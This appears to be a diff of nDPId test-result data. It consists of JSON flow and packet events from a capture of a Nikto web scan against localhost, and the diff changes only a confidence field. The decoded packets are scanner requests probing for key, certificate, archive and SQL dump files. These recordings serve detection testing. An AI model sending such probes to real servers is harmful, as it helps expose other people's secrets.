-01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277328,"pkt":"AAAAAAAAAAAAAAAACABFAADAqSFAAEAGkxR\/AAABfwAAAcTGH5DtDpGsIyeJWoAYAED+tAAAAQEICp1m\/XidZv14R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277329,"pkt":"AAAAAAAAAAAAAAAACABFAADA2JJAAEAGY6N\/AAABfwAAAcTIH5BNx+AlanMTuoAYAED+tAAAAQEICp1m\/XmdZv15R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277331,"pkt":"AAAAAAAAAAAAAAAACABFAADHC9ZAAEAGMFl\/AAABfwAAAcTKH5CiFTNhL7Iog4AYAED+uwAAAQEICp1m\/XqdZv16R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277333,"pkt":"AAAAAAAAAAAAAAAACABFAADHgXtAAEAGurN\/AAABfwAAAcTMH5Cx2rnNvwRWuoAYAED+uwAAAQEICp1m\/X2dZv19R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277334,"pkt":"AAAAAAAAAAAAAAAACABFAADFmcZAAEAGomp\/AAABfwAAAcTOH5DYYKFyIBNeYIAYAED+uQAAAQEICp1m\/X6dZv1+R0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277336,"pkt":"AAAAAAAAAAAAAAAACABFAADFO7NAAEAGAH5\/AAABfwAAAcTQH5BUXAMIX4xO7oAYAED+uQAAAQEICp1m\/YCdZv2AR0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277337,"pkt":"AAAAAAAAAAAAAAAACABFAAC9OaFAAEAGAph\/AAABfwAAAcTSH5DijwEqjka6TYAYAED+sQAAAQEICp1m\/YGdZv2BR0VUIC8wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
